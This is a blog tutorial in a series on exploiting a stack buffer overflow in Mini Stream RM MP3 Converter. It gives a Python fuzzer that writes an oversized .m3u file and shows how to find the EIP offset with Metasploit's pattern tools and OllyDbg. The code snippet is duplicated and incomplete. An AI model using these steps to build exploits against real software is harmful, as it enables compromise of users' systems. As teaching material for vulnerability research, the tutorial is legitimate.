In the two previous article we have learned Exploitation via Buffer Overflow Vulnerability - Stack Based Overflow (Case Study: Buffer Overflow in Mini Stream RM MP3 Converter).
In this article we will explain how we get the fuzzer code.
To make a fuzzer, we will create file containing many characters to make Mini Stream crash
-----------------------------------------------------------------
buffer += "\x41" * 20000;
filename = "bikinkacau" + ".m3u";
file = open(filename,"w")
file.writelines(buffer)
file.close()
-----------------------------------------------------------------filename = "bikinkacau" + ".m3u";
file = open(filename,"w")
file.writelines(buffer)
file.close()
Then, load this file using Mini Stream, and the error code:-71 appeared. It's also happen when we load any file that is not appropriate with the application format.
Let's try to open original file .m3u
Ok, the file is opened successfully, then let's see the content of the file.
Next, let's add pattern character created by pattern_create.rb after the end of the content
The content of the file become :
Next, load TV.m3u having been modified with Mini Stream application and the application is closed suddenly. That means we were succcess to make a fuzzer to make the application crash.
Now, we will analyze in which number of character the EIP is overwritten by attach Mini Stream with Ollydbg, then load TV.m3u.
We will se the EIP is overwritten..
et's analyze in what number of input, the EIP and ESP have been overwritten. We can use pattern_offset to do that.
EIP : #/pentest/exploits/framework/tools/pattern_offset.rb 69573469 20000ESP : #/pentest/exploits/framework/tools/pattern_offset.rb 69573469 20000
0 komentar:
Post a Comment